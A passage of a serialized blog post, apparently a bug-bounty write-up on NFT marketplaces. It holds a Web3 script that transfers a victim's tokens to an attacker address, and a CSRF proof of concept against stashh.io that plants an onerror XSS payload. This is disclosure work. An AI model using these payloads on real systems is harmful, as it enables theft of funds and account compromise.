''",{"type":26,"tag":137,"props":34436,"children":34437},{"style":5601},[34438],{"type":32,"value":6099},{"type":26,"tag":137,"props":34440,"children":34441},{"class":5559,"line":11634},[34442,34446,34451],{"type":26,"tag":137,"props":34443,"children":34444},{"style":5584},[34445],{"type":32,"value":34315},{"type":26,"tag":137,"props":34447,"children":34448},{"style":6837},[34449],{"type":32,"value":34450}," 'bool'",{"type":26,"tag":137,"props":34452,"children":34453},{"style":5601},[34454],{"type":32,"value":6099},{"type":26,"tag":137,"props":34456,"children":34457},{"class":5559,"line":11652},[34458],{"type":26,"tag":137,"props":34459,"children":34460},{"style":5601},[34461],{"type":32,"value":34332},{"type":26,"tag":137,"props":34463,"children":34464},{"class":5559,"line":11697},[34465],{"type":26,"tag":137,"props":34466,"children":34467},{"style":5601},[34468],{"type":32,"value":34386},{"type":26,"tag":137,"props":34470,"children":34471},{"class":5559,"line":11803},[34472,34477,34482],{"type":26,"tag":137,"props":34473,"children":34474},{"style":5584},[34475],{"type":32,"value":34476},"          type:",{"type":26,"tag":137,"props":34478,"children":34479},{"style":6837},[34480],{"type":32,"value":34481}," 'function'",{"type":26,"tag":137,"props":34483,"children":34484},{"style":5601},[34485],{"type":32,"value":6099},{"type":26,"tag":137,"props":34487,"children":34488},{"class":5559,"line":26089},[34489],{"type":26,"tag":137,"props":34490,"children":34491},{"style":5601},[34492],{"type":32,"value":27965},{"type":26,"tag":137,"props":34494,"children":34495},{"class":5559,"line":26124},[34496],{"type":26,"tag":137,"props":34497,"children":34498},{"style":5601},[34499],{"type":32,"value":34500},"      ];\n",{"type":26,"tag":137,"props":34502,"children":34503},{"class":5559,"line":26132},[34504],{"type":26,"tag":137,"props":34505,"children":34506},{"emptyLinePlaceholder":18},[34507],{"type":32,"value":6276},{"type":26,"tag":137,"props":34509,"children":34510},{"class":5559,"line":26140},[34511,34515,34520,34524,34529,34534,34538,34543,34547,34551],{"type":26,"tag":137,"props":34512,"children":34513},{"style":5573},[34514],{"type":32,"value":34142},{"type":26,"tag":137,"props":34516,"children":34517},{"style":5584},[34518],{"type":32,"value":34519}," web3",{"type":26,"tag":137,"props":34521,"children":34522},{"style":5590},[34523],{"type":32,"value":5593},{"type":26,"tag":137,"props":34525,"children":34526},{"style":5573},[34527],{"type":32,"value":34528}," new",{"type":26,"tag":137,"props":34530,"children":34531},{"style":5682},[34532],{"type":32,"value":34533}," Web3",{"type":26,"tag":137,"props":34535,"children":34536},{"style":5601},[34537],{"type":32,"value":165},{"type":26,"tag":137,"props":34539,"children":34540},{"style":5584},[34541],{"type":32,"value":34542},"window",{"type":26,"tag":137,"props":34544,"children":34545},{"style":5601},[34546],{"type":32,"value":470},{"type":26,"tag":137,"props":34548,"children":34549},{"style":5584},[34550],{"type":32,"value":34012},{"type":26,"tag":137,"props":34552,"children":34553},{"style":5601},[34554],{"type":32,"value":6430},{"type":26,"tag":137,"props":34556,"children":34557},{"class":5559,"line":26149},[34558],{"type":26,"tag":137,"props":34559,"children":34560},{"emptyLinePlaceholder":18},[34561],{"type":32,"value":6276},{"type":26,"tag":137,"props":34563,"children":34564},{"class":5559,"line":26191},[34565,34569,34574,34578,34582,34586,34590,34595,34599,34604,34608,34613,34617,34622],{"type":26,"tag":137,"props":34566,"children":34567},{"style":5573},[34568],{"type":32,"value":34142},{"type":26,"tag":137,"props":34570,"children":34571},{"style":5584},[34572],{"type":32,"value":34573}," tokenContract",{"type":26,"tag":137,"props":34575,"children":34576},{"style":5590},[34577],{"type":32,"value":5593},{"type":26,"tag":137,"props":34579,"children":34580},{"style":5573},[34581],{"type":32,"value":34528},{"type":26,"tag":137,"props":34583,"children":34584},{"style":5584},[34585],{"type":32,"value":34519},{"type":26,"tag":137,"props":34587,"children":34588},{"style":5601},[34589],{"type":32,"value":470},{"type":26,"tag":137,"props":34591,"children":34592},{"style":5584},[34593],{"type":32,"value":34594},"eth",{"type":26,"tag":137,"props":34596,"children":34597},{"style":5601},[34598],{"type":32,"value":470},{"type":26,"tag":137,"props":34600,"children":34601},{"style":5682},[34602],{"type":32,"value":34603},"Contract",{"type":26,"tag":137,"props":34605,"children":34606},{"style":5601},[34607],{"type":32,"value":165},{"type":26,"tag":137,"props":34609,"children":34610},{"style":5584},[34611],{"type":32,"value":34612},"tokenAbi",{"type":26,"tag":137,"props":34614,"children":34615},{"style":5601},[34616],{"type":32,"value":1108},{"type":26,"tag":137,"props":34618,"children":34619},{"style":5584},[34620],{"type":32,"value":34621},"contractAddress",{"type":26,"tag":137,"props":34623,"children":34624},{"style":5601},[34625],{"type":32,"value":6430},{"type":26,"tag":137,"props":34627,"children":34628},{"class":5559,"line":26224},[34629],{"type":26,"tag":137,"props":34630,"children":34631},{"emptyLinePlaceholder":18},[34632],{"type":32,"value":6276},{"type":26,"tag":137,"props":34634,"children":34635},{"class":5559,"line":26232},[34636,34640,34645,34649],{"type":26,"tag":137,"props":34637,"children":34638},{"style":5573},[34639],{"type":32,"value":34142},{"type":26,"tag":137,"props":34641,"children":34642},{"style":5584},[34643],{"type":32,"value":34644}," transactionObject",{"type":26,"tag":137,"props":34646,"children":34647},{"style":5590},[34648],{"type":32,"value":5593},{"type":26,"tag":137,"props":34650,"children":34651},{"style":5601},[34652],{"type":32,"value":5875},{"type":26,"tag":137,"props":34654,"children":34655},{"class":5559,"line":26240},[34656,34661,34665],{"type":26,"tag":137,"props":34657,"children":34658},{"style":5584},[34659],{"type":32,"value":34660},"        from:",{"type":26,"tag":137,"props":34662,"children":34663},{"style":5584},[34664],{"type":32,"value":34147},{"type":26,"tag":137,"props":34666,"children":34667},{"style":5601},[34668],{"type":32,"value":6099},{"type":26,"tag":137,"props":34670,"children":34671},{"class":5559,"line":26249},[34672,34677,34681],{"type":26,"tag":137,"props":34673,"children":34674},{"style":5584},[34675],{"type":32,"value":34676},"        to:",{"type":26,"tag":137,"props":34678,"children":34679},{"style":5584},[34680],{"type":32,"value":34206},{"type":26,"tag":137,"props":34682,"children":34683},{"style":5601},[34684],{"type":32,"value":6099},{"type":26,"tag":137,"props":34686,"children":34687},{"class":5559,"line":26325},[34688,34693,34697,34701],{"type":26,"tag":137,"props":34689,"children":34690},{"style":5584},[34691],{"type":32,"value":34692},"        data:",{"type":26,"tag":137,"props":34694,"children":34695},{"style":5584},[34696],{"type":32,"value":34573},{"type":26,"tag":137,"props":34698,"children":34699},{"style":5601},[34700],{"type":32,"value":470},{"type":26,"tag":137,"props":34702,"children":34703},{"style":5584},[34704],{"type":32,"value":34705},"methods\n",{"type":26,"tag":137,"props":34707,"children":34708},{"class":5559,"line":26358},[34709,34714,34719,34723,34728,34732,34737,34741,34746,34750,34755,34759,34764,34768,34773],{"type":26,"tag":137,"props":34710,"children":34711},{"style":5601},[34712],{"type":32,"value":34713},"          .",{"type":26,"tag":137,"props":34715,"children":34716},{"style":5682},[34717],{"type":32,"value":34718},"transfer",{"type":26,"tag":137,"props":34720,"children":34721},{"style":5601},[34722],{"type":32,"value":165},{"type":26,"tag":137,"props":34724,"children":34725},{"style":5584},[34726],{"type":32,"value":34727},"attackerAddress",{"type":26,"tag":137,"props":34729,"children":34730},{"style":5601},[34731],{"type":32,"value":1108},{"type":26,"tag":137,"props":34733,"children":34734},{"style":5584},[34735],{"type":32,"value":34736},"web3",{"type":26,"tag":137,"props":34738,"children":34739},{"style":5601},[34740],{"type":32,"value":470},{"type":26,"tag":137,"props":34742,"children":34743},{"style":5584},[34744],{"type":32,"value":34745},"utils",{"type":26,"tag":137,"props":34747,"children":34748},{"style":5601},[34749],{"type":32,"value":470},{"type":26,"tag":137,"props":34751,"children":34752},{"style":5682},[34753],{"type":32,"value":34754},"toWei",{"type":26,"tag":137,"props":34756,"children":34757},{"style":5601},[34758],{"type":32,"value":165},{"type":26,"tag":137,"props":34760,"children":34761},{"style":6837},[34762],{"type":32,"value":34763},"'100000000'",{"type":26,"tag":137,"props":34765,"children":34766},{"style":5601},[34767],{"type":32,"value":1108},{"type":26,"tag":137,"props":34769,"children":34770},{"style":6837},[34771],{"type":32,"value":34772},"'ether'",{"type":26,"tag":137,"props":34774,"children":34775},{"style":5601},[34776],{"type":32,"value":22305},{"type":26,"tag":137,"props":34778,"children":34779},{"class":5559,"line":26366},[34780,34784,34789],{"type":26,"tag":137,"props":34781,"children":34782},{"style":5601},[34783],{"type":32,"value":34713},{"type":26,"tag":137,"props":34785,"children":34786},{"style":5682},[34787],{"type":32,"value":34788},"encodeABI",{"type":26,"tag":137,"props":34790,"children":34791},{"style":5601},[34792],{"type":32,"value":6082},{"type":26,"tag":137,"props":34794,"children":34795},{"class":5559,"line":26374},[34796],{"type":26,"tag":137,"props":34797,"children":34798},{"style":5601},[34799],{"type":32,"value":11507},{"type":26,"tag":137,"props":34801,"children":34802},{"class":5559,"line":26411},[34803],{"type":26,"tag":137,"props":34804,"children":34805},{"emptyLinePlaceholder":18},[34806],{"type":32,"value":6276},{"type":26,"tag":137,"props":34808,"children":34809},{"class":5559,"line":26424},[34810,34815,34819,34823,34827,34832,34836,34841],{"type":26,"tag":137,"props":34811,"children":34812},{"style":5584},[34813],{"type":32,"value":34814},"      web3",{"type":26,"tag":137,"props":34816,"children":34817},{"style":5601},[34818],{"type":32,"value":470},{"type":26,"tag":137,"props":34820,"children":34821},{"style":5584},[34822],{"type":32,"value":34594},{"type":26,"tag":137,"props":34824,"children":34825},{"style":5601},[34826],{"type":32,"value":470},{"type":26,"tag":137,"props":34828,"children":34829},{"style":5682},[34830],{"type":32,"value":34831},"sendTransaction",{"type":26,"tag":137,"props":34833,"children":34834},{"style":5601},[34835],{"type":32,"value":165},{"type":26,"tag":137,"props":34837,"children":34838},{"style":5584},[34839],{"type":32,"value":34840},"transactionObject",{"type":26,"tag":137,"props":34842,"children":34843},{"style":5601},[34844],{"type":32,"value":6430},{"type":26,"tag":137,"props":34846,"children":34847},{"class":5559,"line":26437},[34848],{"type":26,"tag":137,"props":34849,"children":34850},{"style":5601},[34851],{"type":32,"value":34852},"    });\n",{"type":26,"tag":137,"props":34854,"children":34855},{"class":5559,"line":26450},[34856],{"type":26,"tag":137,"props":34857,"children":34858},{"style":5601},[34859],{"type":32,"value":8457},{"type":26,"tag":137,"props":34861,"children":34862},{"class":5559,"line":26504},[34863],{"type":26,"tag":137,"props":34864,"children":34865},{"style":5601},[34866],{"type":32,"value":6507},{"type":26,"tag":137,"props":34868,"children":34869},{"class":5559,"line":26513},[34870],{"type":26,"tag":137,"props":34871,"children":34872},{"emptyLinePlaceholder":18},[34873],{"type":32,"value":6276},{"type":26,"tag":137,"props":34875,"children":34877},{"class":5559,"line":34876},51,[34878,34882,34886,34891],{"type":26,"tag":137,"props":34879,"children":34880},{"style":5573},[34881],{"type":32,"value":22076},{"type":26,"tag":137,"props":34883,"children":34884},{"style":5601},[34885],{"type":32,"value":165},{"type":26,"tag":137,"props":34887,"children":34888},{"style":6837},[34889],{"type":32,"value":34890},"'https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js'",{"type":26,"tag":137,"props":34892,"children":34893},{"style":5601},[34894],{"type":32,"value":6430},{"type":26,"tag":137,"props":34896,"children":34898},{"class":5559,"line":34897},52,[34899,34904,34908,34912,34916,34921],{"type":26,"tag":137,"props":34900,"children":34901},{"style":5682},[34902],{"type":32,"value":34903},"setTimeout",{"type":26,"tag":137,"props":34905,"children":34906},{"style":5601},[34907],{"type":32,"value":165},{"type":26,"tag":137,"props":34909,"children":34910},{"style":5584},[34911],{"type":32,"value":34088},{"type":26,"tag":137,"props":34913,"children":34914},{"style":5601},[34915],{"type":32,"value":1108},{"type":26,"tag":137,"props":34917,"children":34918},{"style":5626},[34919],{"type":32,"value":34920},"1e3",{"type":26,"tag":137,"props":34922,"children":34923},{"style":5601},[34924],{"type":32,"value":6430},{"type":26,"tag":35,"props":34926,"children":34927},{},[34928,34933],{"type":26,"tag":84,"props":34929,"children":34930},{},[34931],{"type":32,"value":34932},"CSRF & XSS",{"type":32,"value":34934},"\nWe continued our investigation of potential XSS vulnerabilities by exploring various sinks, such as common field errors and the handling of file uploads in different marketplaces.",{"type":26,"tag":35,"props":34936,"children":34937},{},[34938,34940,34945],{"type":32,"value":34939},"Our attention was drawn to ",{"type":26,"tag":41,"props":34941,"children":34943},{"href":33875,"rel":34942},[45],[34944],{"type":32,"value":33879},{"type":32,"value":34946},", an online platform that allows users to upload images. During the image uploading process, we noticed that certain parameters were being sent in the request, as shown below:",{"type":26,"tag":35,"props":34948,"children":34949},{},[34950],{"type":26,"tag":2210,"props":34951,"children":34953},{"alt":7,"src":34952},"/posts/web2-bug-repellant-instructions/csrf.png",[],{"type":26,"tag":35,"props":34955,"children":34956},{},[34957],{"type":32,"value":34958},"and here there is the code:",{"type":26,"tag":5512,"props":34960,"children":34962},{"className":33958,"code":34961,"language":33960,"meta":7,"style":7},"\u003Chtml>\n  \u003Cbody>\n  \u003Cscript>history.pushState('', '', '/')\u003C/script>\n    \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n     \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n      \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq<img/src=x onerror=alert(document.domain)>","to":"profile-assets","type":"icon"}\" />\n      \u003Cinput type=\"submit\" value=\"Submit request\" />\n    \u003C/form>\n  \u003C/body>\n\n  \u003Cscript>\n\n    (async ()=>{\n        const blob = await (await fetch(\"/sapo.png\")).blob()\n\n        let f = new File([blob], 'sapo.png', {type: 'image/png'})\n        const dataTransfer = new DataTransfer();\n        dataTransfer.items.add(f);\n\n        file123.files = dataTransfer.files;\n    })()\n\n  \u003C/script>\n\u003C/html>\n",[34963],{"type":26,"tag":130,"props":34964,"children":34965},{"__ignoreMap":7},[34966,34983,35000,35034,35120,35177,35376,35417,35433,35449,35456,35471,35478,35490,35549,35556,35619,35648,35685,35692,35730,35743,35750,35765],{"type":26,"tag":137,"props":34967,"children":34968},{"class":5559,"line":5560},[34969,34974,34979],{"type":26,"tag":137,"props":34970,"children":34972},{"style":34971},"--shiki-default:#808080",[34973],{"type":32,"value":8391},{"type":26,"tag":137,"props":34975,"children":34976},{"style":5573},[34977],{"type":32,"value":34978},"html",{"type":26,"tag":137,"props":34980,"children":34981},{"style":34971},[34982],{"type":32,"value":8577},{"type":26,"tag":137,"props":34984,"children":34985},{"class":5559,"line":5412},[34986,34991,34996],{"type":26,"tag":137,"props":34987,"children":34988},{"style":34971},[34989],{"type":32,"value":34990},"  \u003C",{"type":26,"tag":137,"props":34992,"children":34993},{"style":5573},[34994],{"type":32,"value":34995},"body",{"type":26,"tag":137,"props":34997,"children":34998},{"style":34971},[34999],{"type":32,"value":8577},{"type":26,"tag":137,"props":35001,"children":35002},{"class":5559,"line":5417},[35003,35007,35012,35016,35021,35026,35030],{"type":26,"tag":137,"props":35004,"children":35005},{"style":34971},[35006],{"type":32,"value":34990},{"type":26,"tag":137,"props":35008,"children":35009},{"style":5573},[35010],{"type":32,"value":35011},"script",{"type":26,"tag":137,"props":35013,"children":35014},{"style":34971},[35015],{"type":32,"value":13052},{"type":26,"tag":137,"props":35017,"children":35018},{"style":5601},[35019],{"type":32,"value":35020},"history.pushState('', '', '/')",{"type":26,"tag":137,"props":35022,"children":35023},{"style":34971},[35024],{"type":32,"value":35025},"\u003C/",{"type":26,"tag":137,"props":35027,"children":35028},{"style":5573},[35029],{"type":32,"value":35011},{"type":26,"tag":137,"props":35031,"children":35032},{"style":34971},[35033],{"type":32,"value":8577},{"type":26,"tag":137,"props":35035,"children":35036},{"class":5559,"line":5642},[35037,35042,35047,35052,35056,35061,35066,35070,35075,35079,35083,35088,35093,35097,35102,35107,35111,35116],{"type":26,"tag":137,"props":35038,"children":35039},{"style":34971},[35040],{"type":32,"value":35041},"    \u003C",{"type":26,"tag":137,"props":35043,"children":35044},{"style":5573},[35045],{"type":32,"value":35046},"form",{"type":26,"tag":137,"props":35048,"children":35049},{"style":5584},[35050],{"type":32,"value":35051}," id",{"type":26,"tag":137,"props":35053,"children":35054},{"style":5590},[35055],{"type":32,"value":289},{"type":26,"tag":137,"props":35057,"children":35058},{"style":6837},[35059],{"type":32,"value":35060},"\"form123\"",{"type":26,"tag":137,"props":35062,"children":35063},{"style":5584},[35064],{"type":32,"value":35065}," action",{"type":26,"tag":137,"props":35067,"children":35068},{"style":5590},[35069],{"type":32,"value":289},{"type":26,"tag":137,"props":35071,"children":35072},{"style":6837},[35073],{"type":32,"value":35074},"\"https://stashh.io/upload_asset\"",{"type":26,"tag":137,"props":35076,"children":35077},{"style":5584},[35078],{"type":32,"value":19703},{"type":26,"tag":137,"props":35080,"children":35081},{"style":5590},[35082],{"type":32,"value":289},{"type":26,"tag":137,"props":35084,"children":35085},{"style":6837},[35086],{"type":32,"value":35087},"\"POST\"",{"type":26,"tag":137,"props":35089,"children":35090},{"style":5584},[35091],{"type":32,"value":35092}," enctype",{"type":26,"tag":137,"props":35094,"children":35095},{"style":5590},[35096],{"type":32,"value":289},{"type":26,"tag":137,"props":35098,"children":35099},{"style":6837},[35100],{"type":32,"value":35101},"\"multipart/form-data\"",{"type":26,"tag":137,"props":35103,"children":35104},{"style":5584},[35105],{"type":32,"value":35106}," value",{"type":26,"tag":137,"props":35108,"children":35109},{"style":5590},[35110],{"type":32,"value":289},{"type":26,"tag":137,"props":35112,"children":35113},{"style":6837},[35114],{"type":32,"value":35115},"\"asd\"",{"type":26,"tag":137,"props":35117,"children":35118},{"style":34971},[35119],{"type":32,"value":8577},{"type":26,"tag":137,"props":35121,"children":35122},{"class":5559,"line":5745},[35123,35128,35132,35137,35141,35146,35151,35155,35160,35164,35168,35173],{"type":26,"tag":137,"props":35124,"children":35125},{"style":34971},[35126],{"type":32,"value":35127},"     \u003C",{"type":26,"tag":137,"props":35129,"children":35130},{"style":5573},[35131],{"type":32,"value":10952},{"type":26,"tag":137,"props":35133,"children":35134},{"style":5584},[35135],{"type":32,"value":35136}," type",{"type":26,"tag":137,"props":35138,"children":35139},{"style":5590},[35140],{"type":32,"value":289},{"type":26,"tag":137,"props":35142,"children":35143},{"style":6837},[35144],{"type":32,"value":35145},"\"file\"",{"type":26,"tag":137,"props":35147,"children":35148},{"style":5584},[35149],{"type":32,"value":35150}," name",{"type":26,"tag":137,"props":35152,"children":35153},{"style":5590},[35154],{"type":32,"value":289},{"type":26,"tag":137,"props":35156,"children":35157},{"style":6837},[35158],{"type":32,"value":35159},"\"data\"",{"type":26,"tag":137,"props":35161,"children":35162},{"style":5584},[35163],{"type":32,"value":35051},{"type":26,"tag":137,"props":35165,"children":35166},{"style":5590},[35167],{"type":32,"value":289},{"type":26,"tag":137,"props":35169,"children":35170},{"style":6837},[35171],{"type":32,"value":35172},"\"file123\"",{"type":26,"tag":137,"props":35174,"children":35175},{"style":34971},[35176],{"type":32,"value":8577},{"type":26,"tag":137,"props":35178,"children":35179},{"class":5559,"line":5850},[35180,35185,35189,35193,35197,35202,35206,35210,35215,35219,35223,35227,35232,35237,35242,35247,35252,35256,35261,35266,35271,35275,35280,35285,35289,35294,35299,35304,35309,35314,35319,35324,35328,35333,35338,35343,35348,35353,35357,35362,35367,35371],{"type":26,"tag":137,"props":35181,"children":35182},{"style":34971},[35183],{"type":32,"value":35184},"      \u003C",{"type":26,"tag":137,"props":35186,"children":35187},{"style":5573},[35188],{"type":32,"value":10952},{"type":26,"tag":137,"props":35190,"children":35191},{"style":5584},[35192],{"type":32,"value":35136},{"type":26,"tag":137,"props":35194,"children":35195},{"style":5590},[35196],{"type":32,"value":289},{"type":26,"tag":137,"props":35198,"children":35199},{"style":6837},[35200],{"type":32,"value":35201},"\"hidden\"",{"type":26,"tag":137,"props":35203,"children":35204},{"style":5584},[35205],{"type":32,"value":35150},{"type":26,"tag":137,"props":35207,"children":35208},{"style":5590},[35209],{"type":32,"value":289},{"type":26,"tag":137,"props":35211,"children":35212},{"style":6837},[35213],{"type":32,"value":35214},"\"config\"",{"type":26,"tag":137,"props":35216,"children":35217},{"style":5584},[35218],{"type":32,"value":35106},{"type":26,"tag":137,"props":35220,"children":35221},{"style":5590},[35222],{"type":32,"value":289},{"type":26,"tag":137,"props":35224,"children":35225},{"style":6837},[35226],{"type":32,"value":22653},{"type":26,"tag":137,"props":35228,"children":35229},{"style":5573},[35230],{"type":32,"value":35231},"{"",{"type":26,"tag":137,"props":35233,"children":35234},{"style":6837},[35235],{"type":32,"value":35236},"address",{"type":26,"tag":137,"props":35238,"children":35239},{"style":5573},[35240],{"type":32,"value":35241},"":"",{"type":26,"tag":137,"props":35243,"children":35244},{"style":6837},[35245],{"type":32,"value":35246},"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq",{"type":26,"tag":137,"props":35248,"children":35249},{"style":5573},[35250],{"type":32,"value":35251},"<",{"type":26,"tag":137,"props":35253,"children":35254},{"style":6837},[35255],{"type":32,"value":2210},{"type":26,"tag":137,"props":35257,"children":35258},{"style":5573},[35259],{"type":32,"value":35260},"/",{"type":26,"tag":137,"props":35262,"children":35263},{"style":6837},[35264],{"type":32,"value":35265},"src",{"type":26,"tag":137,"props":35267,"children":35268},{"style":5573},[35269],{"type":32,"value":35270},"=",{"type":26,"tag":137,"props":35272,"children":35273},{"style":6837},[35274],{"type":32,"value":173},{"type":26,"tag":137,"props":35276,"children":35277},{"style":5573},[35278],{"type":32,"value":35279}," ",{"type":26,"tag":137,"props":35281,"children":35282},{"style":6837},[35283],{"type":32,"value":35284},"onerror",{"type":26,"tag":137,"props":35286,"children":35287},{"style":5573},[35288],{"type":32,"value":35270},{"type":26,"tag":137,"props":35290,"children":35291},{"style":6837},[35292],{"type":32,"value":35293},"alert",{"type":26,"tag":137,"props":35295,"children":35296},{"style":5573},[35297],{"type":32,"value":35298},"(",{"type":26,"tag":137,"props":35300,"children":35301},{"style":6837},[35302],{"type":32,"value":35303},"document",{"type":26,"tag":137,"props":35305,"children":35306},{"style":5573},[35307],{"type":32,"value":35308},".",{"type":26,"tag":137,"props":35310,"children":35311},{"style":6837},[35312],{"type":32,"value":35313},"domain",{"type":26,"tag":137,"props":35315,"children":35316},{"style":5573},[35317],{"type":32,"value":35318},")>","",{"type":26,"tag":137,"props":35320,"children":35321},{"style":6837},[35322],{"type":32,"value":35323},"to",{"type":26,"tag":137,"props":35325,"children":35326},{"style":5573},[35327],{"type":32,"value":35241},{"type":26,"tag":137,"props":35329,"children":35330},{"style":6837},[35331],{"type":32,"value":35332},"profile",{"type":26,"tag":137,"props":35334,"children":35335},{"style":5573},[35336],{"type":32,"value":35337},"-",{"type":26,"tag":137,"props":35339,"children":35340},{"style":6837},[35341],{"type":32,"value":35342},"assets",{"type":26,"tag":137,"props":35344,"children":35345},{"style":5573},[35346],{"type":32,"value":35347},"","",{"type":26,"tag":137,"props":35349,"children":35350},{"style":6837},[35351],{"type":32,"value":35352},"type",{"type":26,"tag":137,"props":35354,"children":35355},{"style":5573},[35356],{"type":32,"value":35241},{"type":26,"tag":137,"props":35358,"children":35359},{"style":6837},[35360],{"type":32,"value":35361},"icon",{"type":26,"tag":137,"props":35363,"children":35364},{"style":5573},[35365],{"type":32,"value":35366},""}",{"type":26,"tag":137,"props":35368,"children":35369},{"style":6837},[35370],{"type":32,"value":22653},{"type":26,"tag":137,"props":35372,"children":35373},{"style":34971},[35374],{"type":32,"value":35375}," />\n",{"type":26,"tag":137,"props":35377,"children":35378},{"class":5559,"line":5878},[35379,35383,35387,35391,35395,35400,35404,35408,35413],{"type":26,"tag":137,"props":35380,"children":35381},{"style":34971},[35382],{"type":32,"value":35184},{"type":26,"tag":137,"props":35384,"children":35385},{"style":5573},[35386],{"type":32,"value":10952},{"type":26,"tag":137,"props":35388,"children":35389},{"style":5584},[35390],{"type":32,"value":35136},{"type":26,"tag":137,"props":35392,"children":35393},{"style":5590},[35394],{"type":32,"value":289},{"type":26,"tag":137,"props":35396,"children":35397},{"style":6837},[35398],{"type":32,"value":35399},"\"submit\"",{"type":26,"tag":137,"props":35401,"children":35402},{"style":5584},[35403],{"type":32,"value":35106},{"type":26,"tag":137,"props":35405,"children":35406},{"style":5590},[35407],{"type":32,"value":289},{"type":26,"tag":137,"props":35409,"children":35410},{"style":6837},[35411],{"type":32,"value":35412},"\"Submit request\"",{"type":26,"tag":137,"props":35414,"children":35415},{"style":34971},[35416],{"type":32,"value":35375},{"type":26,"tag":137,"props":35418,"children":35419},{"class":5559,"line":5891},[35420,35425,35429],{"type":26,"tag":137,"props":35421,"children":35422},{"style":34971},[35423],{"type":32,"value":35424},"    \u003C/",{"type":26,"tag":137,"props":35426,"children":35427},{"style":5573},[35428],{"type":32,"value":35046},{"type":26,"tag":137,"props":35430,"children":35431},{"style":34971},[35432],{"type":32,"value":8577},{"type":26,"tag":137,"props":35434,"children":35435},{"class":5559,"line":5909},[35436,35441,35445],{"type":26,"tag":137,"props":35437,"children":35438},{"style":34971},[35439],{"type":32,"value":35440},"  \u003C/",{"type":26,"tag":137,"props":35442,"children":35443},{"style":5573},[35444],{"type":32,"value":34995},{"type":26,"tag":137,"props":35446,"children":35447},{"style":34971},[35448],{"type":32,"value":8577},{"type":26,"tag":137,"props":35450,"children":35451},{"class":5559,"line":5930},[35452],{"type":26,"tag":137,"props":35453,"children":35454},{"emptyLinePlaceholder":18},[35455],{"type":32,"value":6276},{"type":26,"tag":137,"props":35457,"children":35458},{"class":5559,"line":5939},[35459,35463,35467],{"type":26,"tag":137,"props":35460,"children":35461},{"style":34971},[35462],{"type":32,"value":34990},{"type":26,"tag":137,"props":35464,"children":35465},{"style":5573},[35466],{"type":32,"value":35011},{"type":26,"tag":137,"props":35468,"children":35469},{"style":34971},[35470],{"type":32,"value":8577},{"type":26,"tag":137,"props":35472,"children":35473},{"class":5559,"line":6191},[35474],{"type":26,"tag":137,"props":35475,"children":35476},{"emptyLinePlaceholder":18},[35477],{"type":32,"value":6276},{"type":26,"tag":137,"props":35479,"children":35480},{"class":5559,"line":6208},[35481,35486],{"type":26,"tag":137,"props":35482,"children":35483},{"style":5601},[35484],{"type":32,"value":35485},"    (async ()=>",{"type":26,"tag":137,"props":35487,"children":35488},{"style":5573},[35489],{"type":32,"value":13471},{"type":26,"tag":137,"props":35491,"children":35492},{"class":5559,"line":6225},[35493,35498,35503,35508,35513,35517,35521,35526,35530,35535,35540,35545],{"type":26,"tag":137,"props":35494,"children":35495},{"style":5584},[35496],{"type":32,"value":35497},"        const",{"type":26,"tag":137,"props":35499,"children":35500},{"style":5584},[35501],{"type":32,"value":35502}," blob",{"type":26,"tag":137,"props":35504,"children":35505},{"style":5590},[35506],{"type":32,"value":35507}," = ",{"type":26,"tag":137,"props":35509,"children":35510},{"style":5610},[35511],{"type":32,"value":35512},"await",{"type":26,"tag":137,"props":35514,"children":35515},{"style":5590},[35516],{"type":32,"value":4625},{"type":26,"tag":137,"props":35518,"children":35519},{"style":5610},[35520],{"type":32,"value":35512},{"type":26,"tag":137,"props":35522,"children":35523},{"style":5682},[35524],{"type":32,"value":35525}," fetch",{"type":26,"tag":137,"props":35527,"children":35528},{"style":5590},[35529],{"type":32,"value":165},{"type":26,"tag":137,"props":35531,"children":35532},{"style":6837},[35533],{"type":32,"value":35534},"\"/sapo.png\"",{"type":26,"tag":137,"props":35536,"children":35537},{"style":5590},[35538],{"type":32,"value":35539},")).",{"type":26,"tag":137,"props":35541,"children":35542},{"style":5682},[35543],{"type":32,"value":35544},"blob",{"type":26,"tag":137,"props":35546,"children":35547},{"style":5590},[35548],{"type":32,"value":10320},{"type":26,"tag":137,"props":35550,"children":35551},{"class":5559,"line":6238},[35552],{"type":26,"tag":137,"props":35553,"children":35554},{"emptyLinePlaceholder":18},[35555],{"type":32,"value":6276},{"type":26,"tag":137,"props":35557,"children":35558},{"class":5559,"line":6247},[35559,35563,35568,35572,35576,35581,35586,35590,35594,35599,35604,35609,35614],{"type":26,"tag":137,"props":35560,"children":35561},{"style":5584},[35562],{"type":32,"value":5648},{"type":26,"tag":137,"props":35564,"children":35565},{"style":5584},[35566],{"type":32,"value":35567}," f",{"type":26,"tag":137,"props":35569,"children":35570},{"style":5590},[35571],{"type":32,"value":35507},{"type":26,"tag":137,"props":35573,"children":35574},{"style":5573},[35575],{"type":32,"value":17714},{"type":26,"tag":137,"props":35577,"children":35578},{"style":5682},[35579],{"type":32,"value":35580}," File",{"type":26,"tag":137,"props":35582,"children":35583},{"style":5590},[35584],{"type":32,"value":35585},"([",{"type":26,"tag":137,"props":35587,"children":35588},{"style":5584},[35589],{"type":32,"value":35544},{"type":26,"tag":137,"props":35591,"children":35592},{"style":5590},[35593],{"type":32,"value":25640},{"type":26,"tag":137,"props":35595,"children":35596},{"style":6837},[35597],{"type":32,"value":35598},"'sapo.png'",{"type":26,"tag":137,"props":35600,"children":35601},{"style":5590},[35602],{"type":32,"value":35603},", {",{"type":26,"tag":137,"props":35605,"children":35606},{"style":5584},[35607],{"type":32,"value":35608},"type:",{"type":26,"tag":137,"props":35610,"children":35611},{"style":6837},[35612],{"type":32,"value":35613}," 'image/png'",{"type":26,"tag":137,"props":35615,"children":35616},{"style":5590},[35617],{"type":32,"value":35618},"})\n",{"type":26,"tag":137,"props":35620,"children":35621},{"class":5559,"line":6270},[35622,35626,35631,35635,35639,35644],{"type":26,"tag":137,"props":35623,"children":35624},{"style":5584},[35625],{"type":32,"value":35497},{"type":26,"tag":137,"props":35627,"children":35628},{"style":5584},[35629],{"type":32,"value":35630}," 